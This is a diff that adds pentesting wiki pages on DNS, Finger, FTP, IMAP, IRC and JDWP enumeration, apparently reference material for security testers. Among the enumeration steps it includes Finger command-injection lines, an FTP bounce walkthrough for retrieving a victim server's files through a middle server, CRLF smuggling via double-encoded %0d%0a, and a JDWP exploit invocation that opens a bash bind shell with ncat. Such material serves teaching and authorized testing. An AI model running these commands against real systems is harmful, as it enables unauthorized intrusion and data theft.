+```bash
+ #Query paypal subdomains to ns3.isc-sns.info
+ nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=paypal.com ns3.isc-sns.info
+```
+
+### IPv6
+
+Brute force using "AAAA" requests to gather IPv6 of the subdomains.
+
+```bash
+dnsdict6 -s -t <domain>
+```
+
+Bruteforce reverse DNS in using IPv6 addresses
+
+```bash
+dnsrevenum6 pri.authdns.ripe.net 2001:67c:2e8::/48 #Will use the dns pri.authdns.ripe.net
+```
+
+### DNS Recursion DDoS
+
+If **DNS recursion is enabled**, an attacker could **spoof** the **origin** on the UDP packet in order to make the **DNS send the response to the victim server**. An attacker could abuse **ANY** or **DNSSEC** record types as they use to have the bigger responses.  
+The way to **check** if a DNS supports **recursion** is to query a domain name and **check** if the **flag "ra"** \(_recursion available_\) is in the response:
+
+```bash
+dig google.com A @<IP>
+```
+
+**Non available**:
+
+![](../.gitbook/assets/image%20%28155%29.png)
+
+**Available**:
+
+![](../.gitbook/assets/image%20%28139%29.png)
+
+### Mail to nonexistent account
+
+From book: Network Security Assessment \(3rd edition\)
+
+Simply sending an email message to a nonexistent address at a target domain often reveals useful internal network information through a _nondelivery notification_ \(NDN\).
+
+```text
+Generating server: noa.nintendo.com
+
+blah@nintendo.com
+#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found ##
+
+Original message headers:
+
+Received: from ONERDEDGE02.one.nintendo.com (10.13.20.35) by
+ onerdexch08.one.nintendo.com (10.13.30.39) with Microsoft SMTP Server (TLS)
+ id 14.3.174.1; Sat, 26 Apr 2014 16:52:22 -0700
+Received: from barracuda.noa.nintendo.com (205.166.76.35) by
+ ONERDEDGE02.one.nintendo.com (10.13.20.35) with Microsoft SMTP Server (TLS)
+ id 14.3.174.1; Sat, 26 Apr 2014 16:51:22 -0700
+X-ASG-Debug-ID: 1398556333-0614671716199b0d0001-zOQ9WJ
+Received: from gateway05.websitewelcome.com (gateway05.websitewelcome.com  [69.93.154.37]) by 
+barracuda.noa.nintendo.com with ESMTP id xVNPkwaqGgdyH5Ag for <blah@nintendo.com>; Sat, 
+26 Apr 2014 16:52:13 -0700 (PDT)
+X-Barracuda-Envelope-From: chris@example.org
+X-Barracuda-Apparent-Source-IP: 69.93.154.37
+```
+
+The following data in this transcript is useful:
+
+* Internal hostnames, IP addresses, and subdomain layout
+* The mail server is running Microsoft Exchange Server 2010 SP3
+* A Barracuda Networks device is used to perform content filtering
+
+## Config files
+
+```text
+host.conf
+resolv.conf
+named.conf
+```
+
diff --git a/pentesting/pentesting-finger.md b/pentesting/pentesting-finger.md
new file mode 100644
index 00000000..9ecb6899
--- /dev/null
+++ b/pentesting/pentesting-finger.md
@@ -0,0 +1,58 @@
+# 79 - Pentesting Finger
+
+## **Basic Info**
+
+**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number \(if known\), login time, idle time, time mail was last read, and the user's plan and project files.
+
+**Default port:** 79
+
+```text
+PORT   STATE SERVICE
+79/tcp open  finger
+```
+
+## **Enumeration**
+
+### **Banner Grabbing/Basic connection**
+
+```bash
+nc -vn <IP> 79
+echo "root" | nc -vn <IP> 79
+```
+
+### **User enumeration**
+
+```bash
+finger @<Victim>       #List users
+finger admin@<Victim>  #Get info of user
+finger user@<Victim>   #Get info of user
+```
+
+#### **Nmap execute a script for doing using default scripts**
+
+### Metasploit uses more tricks than Nmap
+
+```text
+use auxiliary/scanner/finger/finger_users
+```
+
+### Shodan
+
+* `port:79 USER`
+
+## Command execution
+
+```bash
+finger "|/bin/id@example.com"
+finger "|/bin/ls -a /@example.com"
+```
+
+## Finger Bounce
+
+[Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/)
+
+```text
+finger user@host@victim
+finger @internal@external
+```
+
diff --git a/pentesting/pentesting-ftp/README.md b/pentesting/pentesting-ftp/README.md
new file mode 100644
index 00000000..afef8def
--- /dev/null
+++ b/pentesting/pentesting-ftp/README.md
@@ -0,0 +1,169 @@
+# 21 - Pentesting FTP
+
+## Basic Information
+
+The **File Transfer Protocol \(FTP**\) is a standard network protocol used for the transfer of computer files between a client and server on a computer network.  
+It is a **plain-text** protocol that uses as **new line character `0x0d 0x0a`** so it's important to **connect using telnet** instead of nc.
+
+**Default Port:** 21
+
+```text
+PORT   STATE SERVICE
+21/tcp open  ftp
+```
+
+## Enumeration
+
+### **Banner Grabbing**
+
+```bash
+telnet -vn <IP> 21
+```
+
+### Unauth enum
+
+You can us the commands `HELP` and `FEAT` to obtain some information of the FTP server:
+
+```text
+HELP
+214-The following commands are recognized (* =>'s unimplemented):
+214-CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV    
+214-EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD     
+214-XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP    
+214-NOOP    FEAT    OPTS    AUTH    CCC*    CONF*   ENC*    MIC*    
+214-PBSZ    PROT    TYPE    STRU    MODE    RETR    STOR    STOU    
+214-APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST    
+214-NLST    STAT    SITE    MLSD    MLST    
+214 Direct comments to root@drei.work
+FEAT
+211-Features:
+ PROT
+ CCC
+ PBSZ
+ AUTH TLS
+ MFF modify;UNIX.group;UNIX.mode;
+ REST STREAM
+ MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;
+ UTF8
+ EPRT
+ EPSV
+ LANG en-US
+ MDTM
+ SSCN
+ TVFS
+ MFMT
+ SIZE
+211 End
+```
+
+### Connections
+
+In **Active FTP** the FTP **client** first **initiates** the control **connection** from its port N to FTP Servers command port – port 21. The **client** then **listens** to port **N+1** and sends the port N+1 to FTP Server. FTP **Server** then **initiates** the data **connection**, from **its port M to the port N+1** of the FTP Client.
+
+But, if the FTP Client has a firewall setup that controls the incoming data connections from outside, then active FTP may be a problem. And, a feasible solution for that is Passive FTP.
+
+In **Passive FTP**, the client initiates the control connection from its port N to the port 21 of FTP Server. After this, the client issues a **passv comand**. The server then sends the client one of its port number M. And the **client** **initiates** the data **connection** from **its port P to port M** of the FTP Server.
+
+Source: [https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/](https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/)
+
+### Anonymous login
+
+_anonymous : anonymous  
+anonymous :   
+ftp : ftp_
+
+```bash
+ftp <IP>
+>anonymous
+>anonymous
+>ls -a # List all files (even hidden) (yes, they could be hidden)
+>binary #Set transmission to binary instead of ascii
+>ascii #Set transmission to ascii instead of binary
+>bye #exit
+```
+
+### [Brute force](../../brute-force.md#ftp)
+
+Here you can find a nice list with default ftp credentials: [https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt)
+
+### Automated
+
+Anon login and bounce FTP checks are perform by default by nmap with **-sC** option.
+
+### Shodan
+
+* `ftp`
+* `port:21`
+
+## Browser connection
+
+You can connect to a FTP server using a browser \(like Firefox\) using a URL like: 
+
+```bash
+ftp://anonymous:anonymous@10.10.10.98
+```
+
+Note that if a **web application** is sending data controlled by a user **directly to a FTP server** you can send double URL encode `%0d%0a` \(in double URL encode this is `%250d%250a`\) bytes and make the **FTP server perform arbitrary actions**. One of this possible arbitrary actions is to download content from a users controlled server, perform port scanning or try to talk to other plain-text based services \(like http\).
+
+## Download all files from FTP
+
+```bash
+wget -m ftp://anonymous:anonymous@10.10.10.98 #Donwload all
+wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all
+```
+
+## Some FTP commands
+
+* `USER username`
+* `PASS password`
+* `HELP` The server indicates which commands are supported
+* `PORT 127,0,0,1,0,80`This will indicate the FTP server to establish a connection with the IP 127.0.0.1 in port 80 \(_you need to put the 5th char as "0" and the 6th as the port in decimal or use the 5th and 6th to express the port in hex_\).
+* `EPRT |2|127.0.0.1|80|`This will indicate the FTP server to establish a TCP connection \(_indicated by "2"_\) with the IP 127.0.0.1 in port 80. This command **supports IPv6**.
+* `LIST` This will send the list of files in current folder
+* `APPE /path/something.txt` This will indicate the FTP to store the data received from a **passive** connection or from a **PORT/EPRT** connection to a file. If the filename exists, it will append the data.
+* `STOR /path/something.txt` Like `APPE` but it will overwrite the files
+* `STOU /path/something.txt` Like `APPE`, but if exists it won't do anything.
+* `RETR /path/to/file` A passive or a port connection must be establish. Then, the FTP server will send the indicated file through that connection
+* `REST 6` This will indicate the server that next time it send something using `RETR` it should start in the 6th byte.
+* `TYPE i` Set transfer to binary
+* `PASV` This will open a passive connection and will indicate the user were he can connects 
+
+![](../../.gitbook/assets/image%20%28184%29.png)
+
+## FTPBounce attack
+
+Some FTP servers allow the command PORT. This command can be used to indicate to the server that you wants to connect to other FTP server at some port. Then, you can use this to scan which ports of a host are open through a FTP server.
+
+[**Learn here how to abuse a FTP server to scan ports.**](ftp-bounce-attack.md)\*\*\*\*
+
+You could also abuse this behaviour to make a FTP server interact with other protocols. You could **upload a file containing an HTTP request** and make the vulnerable FTP server **send it to an arbitrary HTTP server** \(_maybe to add a new admin user?_\) or even upload a FTP request and make the vulnerable FTP server download a file for a different FTP server.   
+The theory is easy:
+
+1. **Upload the request \(inside a text file\) to the vulnerable server.** Remember that if you want to talk with another HTTP or FTP server you need to change lines with `0x0d 0x0a`
+2. **Use `REST X` to avoid sending the characters you don't want to send** \(maybe to upload the request inside the file you needed to put some image header at the begging\)
+3. **Use `PORT`to connect to the arbitrary server and service** 
+4. **Use `RETR`to send the saved request to the server.** 
+
+Its highly probably that this **will throw an error like** _**Socket not writable**_ **because the connection doesn't last enough to send the data with `RETR`**. Suggestions to try to avoid that are:
+
+* If you are sending an HTTP request, **put the same request one after another** until **~0.5MB** at least. Like this: 
+
+{% file src="../../.gitbook/assets/posts \(1\).txt" caption="posts.txt" %}
+
+* Try to **fill the request with "junk" data relative to the protocol** \(talking to FTP maybe just junk commands or repeating the `RETR`instruction to get the file\)
+* Just **fill the request with a lot of null characters or others** \(divided on lines or not\)
+
+Anyway, here you have an [old example about how to abuse this to make a FTP server download a file from a different FTP server.](ftp-bounce-download-2oftp-file.md)
+
+## Filezilla Server Vulnerability
+
+**FileZilla** usually **binds** to **local** an **Administrative service** for the **FileZilla-Server** \(port 14147\). If you can create a **tunnel** from **your machine** to access this port, you can **connect** to **it** using a **blank password** and **create** a **new user** for the FTP service.
+
+## Config files
+
+```text
+ftpusers
+ftp.conf
+proftpd.conf
+```
+
diff --git a/pentesting/pentesting-ftp/ftp-bounce-attack.md b/pentesting/pentesting-ftp/ftp-bounce-attack.md
new file mode 100644
index 00000000..6357da0f
--- /dev/null
+++ b/pentesting/pentesting-ftp/ftp-bounce-attack.md
@@ -0,0 +1,35 @@
+# FTP Bounce attack - Scan
+
+## FTP Bounce - Scanning
+
+### Manual
+
+1. Connect to vulnerable FTP
+2. Use **`PORT`**or **`EPRT`**\(but only 1 of them\) to make it establish a connection with the _&lt;IP:Port&gt;_ you want to scan:
+
+   `PORT 172,32,80,80,0,8080`  
+   `EPRT |2|172.32.80.80|8080|`
+
+3. Use **`LIST`**\(this will just send to the connected _&lt;IP:Port&gt;_ the list of current files in the FTP folder\) and check for the possible responses: `150 File status okay` \(This means the port is open\) or `425 No connection established` \(This means the port is closed\)
+   1. Instead of `LIST` you could also use **`RETR /file/in/ftp`** and look for similar `Open/Close` responses.
+
+Example Using **PORT** \(port 8080 of 172.32.80.80 is open and port 7777 is closed\):
+
+![](../../.gitbook/assets/image%20%2885%29.png)
+
+Same example using **`EPRT`**\(authentication omitted in the image\):
+
+![](../../.gitbook/assets/image%20%28199%29.png)
+
+Open port using `EPRT` instead of `LIST` \(different env\)
+
+![](../../.gitbook/assets/image%20%28339%29.png)
+
+### **nmap**
+
+```bash
+nmap -b <name>:<pass>@<ftp_server> <victim>
+nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
+nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443
+```
+
diff --git a/pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md b/pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md
new file mode 100644
index 00000000..3505cd68
--- /dev/null
+++ b/pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md
@@ -0,0 +1,147 @@
+# FTP Bounce - Download 2ºFTP file
+
+## Resume
+
+If you have access to a bounce FTP server, you can make it request files of other FTP server \(where you know some credentials\) and download that file to your own server.
+
+### Requirements
+
+FTP valid credentials in the FTP Middle server  
+FTP valid credentials in Victim FTP server  
+Both server accepts the PORT command \(bounce FTP attack\)  
+You can write inside some directory of the FRP Middle server  
+The middle server will have more access inside the Victim FTP Server than you for some reason \(this is what you are going to exploit\) 
+
+### Steps
+
+1. Connect to your own FTP server and make the connection passive \(pasv command\) to make it listen in a directory where the victim service will send the file
+2. Make the file that is going to send the FTP Middle server t the Victim server \(the exploit\). This file will be a plaint text of the needed commands to authenticate against the Victim server, change the directory and download a file to your own server.
+3. Connect to the FTP Middle Server and upload de previous file
+4. Make the FTP Middle server establish a connection with the victim server and send the exploit file
+5. Capture the file in your own FTP server
+6. Delete the exploit file from the FTP Middle server
+
+
+
+All the info in this post was extracted from: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
+
+##  The FTP Bounce Attack
+
+This discusses one of many possible uses of the "FTP server bounce attack". The mechanism used is probably well-known, but to date interest in detailing or fixing it seems low to nonexistent. This particular example demonstrates yet another way in which most electronically enforced "export restrictions" are completely useless and trivial to bypass. It is chosen in an effort to make the reader sit up and notice that there are some really ill-conceived aspects of the standard FTP protocol.
+
+ Thanks also to Alain Knaff at imag.fr for a brief but entertaining discussion of some of these issues a couple of months ago which got me thinking more deeply about them.
+
+###  The motive
+
+You are a user on foreign.fr, IP address F.F.F.F, and want to retrieve cryptographic source code from crypto.com in the US. The FTP server at crypto.com is set up to allow your connection, but deny access to the crypto sources because your source IP address is that of a non-US site \[as near as their FTP server can determine from the DNS, that is\]. In any case, you cannot directly retrieve what you want from crypto.com's server.
+
+ However, crypto.com will allow ufred.edu to download crypto sources because ufred.edu is in the US too. You happen to know that /incoming on ufred.edu is a world-writeable directory that any anonymous user can drop files into and read them back from. Crypto.com's IP address is C.C.C.C.
+
+###  The attack
+
+ This assumes you have an FTP server that does passive mode. Open an FTP connection to your own machine's real IP address \[not localhost\] and log in. Change to a convenient directory that you have write access to, and then do:
+
+```text
+pasv
+stor foobar
+```
+
+ Take note of the address and port that are returned from the PASV command, F,F,F,F,X,X. This FTP session will now hang, so background it or flip to another window or something to proceed with the rest of this.
+
+ Construct a file containing FTP server commands. Let's call this file "`instrs`". It will look like this:
+
+```text
+user ftp
+pass -anonymous@
+cwd /export-restricted-crypto
+type i
+port F,F,F,F,X,X
+retr crypto.tar.Z
+quit
+^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
+^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
+...
+```
+
+ F,F,F,F,X,X is the same address and port that your own machine handed you on the first connection. The trash at the end is extra lines you create, each containing 250 NULLS and nothing else, enough to fill up about 60K of extra data. The reason for this filler is explained later.
+
+ Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "`instrs`" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:
+
+```text
+put instrs
+port C,C,C,C,0,21
+retr instrs
+```
+
+ `Crypto.tar.Z` should now show up as "`foobar`" on your machine via your first FTP connection. If the connection to ufred.edu didn't die by itself due to an apparently common server bug, clean up by deleting "`instrs`" and exiting. Otherwise you'll have to reconnect to finish.
+
+###  Discussion
+
+There are several variants of this. Your PASV listener connection can be opened on any machine that you have file write access to -- your own, another connection to ufred.edu, or somewhere completely unrelated. In fact, it does not even have to be an FTP server -- any utility that will listen on a known TCP port and read raw data from it into a file will do. A passive-mode FTP data connection is simply a convenient way to do this.
+
+ The extra nulls at the end of the command file are to fill up the TCP windows on either end of the ufred -&gt; crypto connection, and ensure that the command connection stays open long enough for the whole session to be executed. Otherwise, most FTP servers tend to abort all transfers and command processing when the control connection closes prematurely. The size of the data is enough to fill both the receive and transmit windows, which on some OSes are quite large \[on the order of 30K\]. You can trim this down if you know what OSes are on either end and the sum of their default TCP window sizes. It is split into lines of 250 characters to avoid overrunning command buffers on the target server -- probably academic since you told the server to quit already.
+
+ If crypto.com disallows \*any\* FTP client connection from you at foreign.fr and you need to see what files are where, you can always put "`list -aR`" in your command file and get a directory listing of the entire tree via ufred.
+
+ You may have to retrieve your command file to the target's FTP server in ASCII mode rather than binary mode. Some FTP servers can deal with raw newlines, but others may need command lines terminated by CRLF pairs. Keep this in mind when retrieving files to daemons other than FTP servers, as well.
+
+###  Other possbilities
+
+ Despite the fact that such third-party connections are one-way only, they can be used for all kinds of things. Similar methods can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time. A little thought will bring realization of numerous other scary possibilities.
+
+ Connections launched this way come from source port 20, which some sites allow through their firewalls in an effort to deal with the "ftp-data" problem. For some purposes, this can be the next best thing to source-routed attacks, and is likely to succeed where source routing fails against packet filters. And it's all made possible by the way the FTP protocol spec was written, allowing control connections to come from anywhere and data connections to go anywhere.
+
+###  Defenses
+
+ There will always be sites on the net with creaky old FTP servers and writeable directories that allow this sort of traffic, so saying "fix all the FTP servers" is the wrong answer. But you can protect your own against both being a third-party bouncepoint and having another one used against you.
+
+ The first obvious thing to do is allow an FTP server to only make data connections to the same host that the control connection originated from. This does not prevent the above attack, of course, since the PASV listener could just as easily be on ufred.edu and thus meet that requirement, but it does prevent \*your\* site from being a potential bouncepoint. It also breaks the concept of "proxy FTP", but hidden somewhere in this paragraph is a very tiny violin.
+
+ The next obvious thing is to prohibit FTP control connections that come from reserved ports, or at least port 20. This prevents the above scenario as stated.
+
+ Both of these things, plus the usual poop about blocking source-routed packets and other avenues of spoofery, are necessary to prevent hacks of this sort. And think about whether or not you really need an open "incoming" directory.
+
+ Only allowing passive-mode client data connections is another possibility, but there are still too many FTP clients in use that aren't passive-aware.
+
+###  "A loose consensus and running code"
+
+ There is some existing work addressing this available here at avian.org \[and has been for several months, I might add\] in the "[fixkits archive](ftp://ftp.avian.org:/src/fixkits/)". Several mods to wu-ftpd-2.4 are presented, which includes code to prevent and log attempts to use bogus PORT commands. Recent security fixes from elsewhere are also included, along with s/key support and various compile-time options to beef up security for specific applications.
+
+ Stan Barber at academ.com is working on merging these and several other fixes into a true updated wu-ftpd release. There are a couple of other divergent efforts going on. Nowhere is it claimed that any of this work is complete yet, but it is a start toward something I have had in mind for a while -- a network-wide release of wu-ftpd-2.5, with contributions from around the net. The wu-ftpd server has become very popular, but is in sad need of yet another security upgrade. It would be nice to pull all the improvements together into one coordinated place, and it looks like it will happen. All of this still won't help people who insist on running vendor-supplied servers, of course.
+
+ Sanity-checking the client connection's source port is not implemented specifically in the FTP server fixes, but in modifications to Wietse's tcp-wrappers package since this problem is more general. A simple PORT option is added that denies connections from configurable ranges of source ports at the tcpd stage, before a called daemon is executed.
+
+ Some of this is pointed to by [/src/fixkits/README](ftp://ftp.avian.org:/src/fixkits/README) in the anonymous FTP area here. Read this roadmap before grabbing other things.
+
+###  Notes
+
+ Adding the nulls at the end of the command file was the key to making this work against a variety of daemons. Simply sending the desired data would usually fail due to the immediate close signaling the daemon to bail out.
+
+ If WUSTL has not given up entirely on the whole wu-ftpd project, they are keeping very quiet about further work. Bryan O'Connor appears to have many other projects to attend to by now...
+
+ This is a trivial script to find world-writeable and ftp-owned directories and files on a unix-based anonymous FTP server. You'd be surprised how many of those writeable "bouncepoints" pop out after a short run of something like this. You will have to later check that you can both PUT and GET files from such places; some servers protect uploaded files against reading. Many do not, and then wonder why they are among this week's top ten warez sites...
+
+```text
+#!/bin/sh
+ftp -n $1 << FOE
+quote "user ftp"
+quote "pass -nobody@"
+prompt
+cd /
+dir "-aR" xxx.$$
+bye
+FOE
+# Not smart enough to figure out ftp's numeric UID if no passwd file!
+cat -v xxx.$$ | awk '
+  BEGIN { idir = "/" ; dirp = 0 }
+  /.:$/ { idir = $0 ; dirp = 1 ; }
+  /^[-d][-r](......w.|........  *[0-9]* ftp  *)/ {
+    if (dirp == 1) print idir
+    dirp = 0
+    print $0
+  } '
+rm xxx.$$
+```
+
+ I suppose one could call this a white paper. It is up for grabs at avian.org in [/random/ftp-attack](ftp://ftp.avian.org:/random/ftp-attack) as well as being posted in various relevant places. \_H\* 950712
+
diff --git a/pentesting/pentesting-imap.md b/pentesting/pentesting-imap.md
new file mode 100644
index 00000000..db87ef32
--- /dev/null
+++ b/pentesting/pentesting-imap.md
@@ -0,0 +1,91 @@
+# 143,993 - Pentesting IMAP
+
+## Internet Message Access Protocol
+
+As its name implies, IMAP allows you to **access your email messages wherever you are**; much of the time, it is accessed via the Internet. Basically, email **messages are stored on servers**. Whenever you check your inbox, your email client contacts the server to connect you with your messages. When you read an email message using IMAP, **you aren't actually downloading** or storing it on your computer; instead, you are **reading it off of the server**. As a result, it's possible to check your email from **several different devices** without missing a thing.
+
+By default, the IMAP protocol works on two ports:
+
+* **Port 143** - this is the default IMAP non-encrypted port
+* **Port 993** - this is the port you need to use if you want to connect using IMAP securely
+
+```text
+PORT    STATE SERVICE REASON
+143/tcp open  imap    syn-ack
+```
+
+## Banner grabbing
+
+```bash
+nc -nv <IP> 143
+openssl s_client -connect <IP>:993 -quiet
+```
+
+### NTLM Auth - Information disclosure
+
+If the server supports NTLM auth \(Windows\) you can obtain sensitive info \(versions\):
+
+```text
+root@kali: telnet example.com 143 
+* OK The Microsoft Exchange IMAP4 service is ready. 
+>> a1 AUTHENTICATE NTLM 
++ 
+>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= 
++ TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
+```
+
+Or **automate** this with **nmap** plugin `imap-ntlm-info.nse`
+
+### [IMAP Bruteforce](../brute-force.md#imap)
+
+## Syntax
+
+```text
+Login
+    A1 LOGIN username password
+Values can be quoted to enclose spaces and special characters. A " must then be escape with a \
+    A1 LOGIN "username" "password"
+
+List Folders/Mailboxes
+    A1 LIST "" *
+    A1 LIST INBOX *
+    A1 LIST "Archive" *
+
+Create new Folder/Mailbox
+    A1 CREATE INBOX.Archive.2012
+    A1 CREATE "To Read"
+
+Delete Folder/Mailbox
+    A1 DELETE INBOX.Archive.2012
+    A1 DELETE "To Read"
+
+Rename Folder/Mailbox
+    A1 RENAME "INBOX.One" "INBOX.Two"
+
+List Subscribed Mailboxes
+    A1 LSUB "" *
+
+Status of Mailbox (There are more flags than the ones listed)
+    A1 STATUS INBOX (MESSAGES UNSEEN RECENT)
+
+Select a mailbox
+    A1 SELECT INBOX
+
+List messages
+    A1 FETCH 1:* (FLAGS)
+    A1 UID FETCH 1:* (FLAGS)
+
+Retrieve Message Content
+    A1 FETCH 2 body[text]
+    A1 FETCH 2 all
+    A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[])
+
+Close Mailbox
+    A1 CLOSE
+
+Logout
+    A1 LOGOUT
+```
+
+From [here](https://donsutherland.org/crib/imap)
+
diff --git a/pentesting/pentesting-irc.md b/pentesting/pentesting-irc.md
new file mode 100644
index 00000000..3f2ad797
--- /dev/null
+++ b/pentesting/pentesting-irc.md
@@ -0,0 +1,75 @@
+# 194,6667,6660-7000 - Pentesting IRC
+
+## Basic Information
+
+IRC was **originally a plain text protocol** \(although later extended\), which on request was assigned port **194/TCP by IANA**. However, the de facto standard has always been to **run IRC on 6667/TCP** and nearby port numbers \(for example TCP ports 6660–6669, 7000\) to **avoid** having to run the IRCd software with **root privileges**.
+
+For connecting to a server it is required merely a **nickname**. Once connection is established, the first thing the server does is a reverse-dns to your ip:
+
+![](https://lh5.googleusercontent.com/C9AbjS9Jn4GvZJ-syptvebGU2jtI4p1UmLsmkBj3--utdFjft1B3Qfij3GDiUqxyp9wq_mbupVdUtfW-_rSo1W_EPFZzCQ7iHSn7-DK3l4-BfylIHluQBNrDWxO0lxCuAMz8EkQ9oi9jwDlH6A)
+
+It seems that overall **there are two kinds of users**: **operators** and ordinary **users**. For logging in as an **operator** it is required a **username** and a **password** \(and in many occasions a particular hostname, ip  and even a particular hostmask\). Within operators there are different privilege levels wherein the administrator has the highest privilege.
+
+**Default ports:** 194, 6667, 6660-7000
+
+```text
+PORT     STATE SERVICE
+6667/tcp open  irc
+```
+
+## Enumeration
+
+### Banner
+
+IRC can support **TLS**.
+
+```bash
+nc -vn <IP> <PORT>
+openssl s_client -connect <IP>:<PORT> -quiet
+```
+
+### Manual
+
+Here you can see how to connect and access the IRC using some **random nickname** and then enumerate some interesting info. You can learn more commands of IRC [here](https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands#USERIP).
+
+```bash
+#Connection with random nickname
+USER ran213eqdw123 0 * ran213eqdw123
+NICK ran213eqdw123
+#If a PING :<random> is responded you need to send
+#PONG :<received random>
+
+VERSION
+HELP
+INFO
+LINKS
+HELPOP USERCMDS
+HELPOP OPERCMDS
+OPERATOR CAPA
+ADMIN      #Admin info
+USERS      #Current number of users
+TIME       #Server's time
+STATS a    #Only operators should be able to run this
+NAMES      #List channel names and usernames inside of each channel -> Nombre del canal y nombre de las personas que estan dentro
+LIST       #List channel names along with channel banner
+WHOIS <USERNAME>      #WHOIS a username
+USERHOST <USERNAME>   #If available, get hostname of a user
+USERIP <USERNAME>     #If available, get ip of a user
+JOIN <CHANNEL_NAME>   #Connect to a channel
+
+#Operator creds Brute-Force
+OPER <USERNAME> <PASSWORD>
+```
+
+### **Find and scan IRC services**
+
+```bash
+nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb
+```
+
+### [Brute Force](../brute-force.md#irc)
+
+### Shodan
+
+* `looking up your hostname`
+
diff --git a/pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/pentesting/pentesting-jdwp-java-debug-wire-protocol.md
new file mode 100644
index 00000000..b84329a1
--- /dev/null
+++ b/pentesting/pentesting-jdwp-java-debug-wire-protocol.md
@@ -0,0 +1,209 @@
+# Pentesting JDWP - Java Debug Wire Protocol
+
+## Exploiting
+
+You can use the python exploit located in [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier)
+
+```bash
+./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
+./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
+./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
+```
+
+I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
+
+Normally this debugger is run on port 8000 and if you establish a TCP connection with the port and send "**JDWP-Handshake**", the server should respond you with the same string.  
+Also, you can check this string in the network to find possible JDWP services.
+
+Listing **processes**, if you find the string "**jdwk**" inside a **java process**, probably it has active the **Java Debug Wired Protocol** and you may be able to move laterally or even **escalate privileges** \(if executed as root\).
+
+## More details
+
+**Copied from** [**https://ioactive.com/hacking-java-debug-wire-protocol-or-how/**](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)\*\*\*\*
+
+### **Java Debug Wire Protocol**
+
+**Java Platform Debug Architecture \(JPDA\)**JDWP is one component of the global Java debugging system, called the Java Platform Debug Architecture \(JPDA\)\[2\]. The following is a diagram of the overall architecture:
+
+ [![](https://ioactive.com/wp-content/uploads/2014/04/jdpa.png)](https://ioactive.com/wp-content/uploads/2014/04/jdpa-1.png)
+
+  The Debuggee consists of a multi-threaded JVM running our target application. In order to be remotely debuggable, the JVM instance must be explicitly started with the option -Xdebug passed on the command line, as well as the option -Xrunjdwp \(or -agentlib\). For example, starting a Tomcat server with remote debugging enabled would look like this:
+
+ [![](https://ioactive.com/wp-content/uploads/2014/04/tomat.png)](https://ioactive.com/wp-content/uploads/2014/04/tomat-1.png)
+
+ As shown in the architecture diagram, the Java Debug Wire Protocol is the central link between the Debugger and the JVM instance. Observations about the protocol include:
+
+* It is a packet-based network binary protocol.
+* It is mostly synchronous. The debugger sends a command over JDWP and expects to receive a reply. However, some commands, like Events, do not expect a synchronous response. They will send a reply when specific conditions are met. For example, a BreakPoint is an Event.
+* It does not use authentication.
+* It does not use encryption.
+
+ All of these observations make total sense since we are talking about a debugging protocol. However, when such a service is exposed to a hostile network, or is Internet facing, things could go wrong.  
+  
+**Handshake**JDWP dictates\[9\] that communication must be initiated by a simple handshake. Upon successful TCP connection, the Debugger \(client\) sends the 14-character ASCII string “JDWP-Handshake”. The Debuggee \(server\) responds to this message by sending the exact same string.  The following scapy\[3\] trace shows the initial two-way handshake:
+
